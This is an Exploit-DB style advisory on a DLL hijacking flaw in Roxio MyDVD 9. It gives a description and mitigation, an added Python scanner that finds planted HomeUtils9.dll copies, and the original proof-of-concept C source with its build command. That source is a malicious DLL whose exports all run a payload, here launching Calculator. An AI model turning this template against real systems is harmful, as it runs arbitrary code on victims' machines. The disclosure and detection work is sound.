vendor: MyDVD 9
by: storm
CVSS: 7.5 HIGH
DLL Hijacking
CWE: 427
Product Name: MyDVD 9
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows Vista SP2
2010

Roxio MyDVD 9 DLL Hijacking Exploit (HomeUtils9.dll)

This exploit targets Roxio MyDVD 9 software and utilizes a DLL hijacking technique. By placing a malicious DLL file named HomeUtils9.dll in the same directory as the vulnerable software, an attacker can execute arbitrary code with the privileges of the user running the software. This can lead to unauthorized access, privilege escalation, or remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update Roxio MyDVD 9 to the latest version. Additionally, users should exercise caution when running software from untrusted sources.
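
A defender-side check for this issue, added here as an example and not part of the original advisory or exploit: it walks a directory tree and reports every copy of HomeUtils9.dll outside the directories listed as trusted, rating a copy that sits beside a .dmsd or .dmsm file (the types the exploit notes list as affected) highest. The function names, the severity labels and the sample tree are assumptions of this example.

```python
import hashlib
import os
import tempfile

DLL_NAME = "homeutils9.dll"          # DLL name from the advisory, lower-cased
PROJECT_EXTS = (".dmsd", ".dmsm")    # file types the exploit notes list as affected


def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def find_planted_dlls(root, trusted_dirs=()):
    """Report every HomeUtils9.dll under root that is not in a trusted directory."""
    trusted = {os.path.normcase(os.path.abspath(d)) for d in trusted_dirs}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if os.path.normcase(os.path.abspath(dirpath)) in trusted:
            continue
        projects = sorted(f for f in files if f.lower().endswith(PROJECT_EXTS))
        for name in files:
            if name.lower() != DLL_NAME:
                continue
            full = os.path.join(dirpath, name)
            # Assumption of this example: a copy beside a project file rates highest.
            findings.append({"dll": full, "sha256": sha256_of(full), "projects": projects,
                             "severity": "high" if projects else "review"})
    return findings


def demo(trust_install=True):
    """Scan a constructed directory tree; returns (folder, projects, severity)."""
    with tempfile.TemporaryDirectory() as root:
        layout = {"install": ["HomeUtils9.dll"],                  # stand-in install dir
                  "share": ["homeutils9.DLL", "holiday.dmsd"],    # planted copy
                  "clean": ["movie.dmsm"]}                        # project file only
        for folder, names in layout.items():
            os.makedirs(os.path.join(root, folder))
            for name in names:
                with open(os.path.join(root, folder, name), "wb") as fh:
                    fh.write(b"constructed sample bytes")
        trusted = [os.path.join(root, "install")] if trust_install else []
        hits = find_planted_dlls(root, trusted)
        return sorted((os.path.basename(os.path.dirname(h["dll"])),
                       h["projects"], h["severity"]) for h in hits)

if __name__ == "__main__":
    print(demo())
```

The SHA-256 in each finding lets a responder compare a reported copy against the DLL shipped in the real install directory.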
Source

Exploit-DB raw data:

/*

Exploit Title: Roxio MyDVD 9 DLL Hijacking Exploit (HomeUtils9.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o HomeUtils9.dll MyDVD9-DLL.c

.dmsd and .dmsm files are affected.

*/

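#include <windows.h>
#include <stdlib.h>   /* exit() */
#define DllExport __declspec (dllexport)

int hax(void);   /* defined below; declared here because every export calls it */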

DllExport void Dispatch_InvokeUpdate() { hax(); }
DllExport void GetCertificateItemValue() { hax(); }
DllExport void GetFeatureEnabled() { hax(); }
DllExport void GetFeatureEnabledGroup() { hax(); }
DllExport void GetFeatureGroup() { hax(); }
DllExport void GetFeatureGroupActivationDetail() { hax(); }
DllExport void GetRoxioKeyContents() { hax(); }
DllExport void LaunchPermission() { hax(); }
DllExport void LaunchPermission_Str() { hax(); }
DllExport void SAR_Dispatch_ActivateComponent() { hax(); }
DllExport void SAR_Dispatch_ActivateProduct() { hax(); }
DllExport void SAR_Dispatch_ActivateProductGroup() { hax(); }
DllExport void SAR_Dispatch_DoRegister() { hax(); }
DllExport void SAR_Dispatch_GetActivationDetail() { hax(); }
DllExport void SAR_Dispatch_IncrementUsage() { hax(); }
DllExport void SAR_Dispatch_IsActivated() { hax(); }
DllExport void SAR_Dispatch_IsRegistered() { hax(); }
DllExport void SAR_Dispatch_ReleaseActivation() { hax(); }
DllExport void SAR_GetCDKey() { hax(); }
DllExport void SAR_UsePermissionsCache() { hax(); }
DllExport void Upgrade() { hax(); }
DllExport void UseCodecPermission() { hax(); }

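/* Proof-of-concept payload: starts Calculator to show that code in the
   loaded DLL ran, then ends the host process. */
int hax(void)
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}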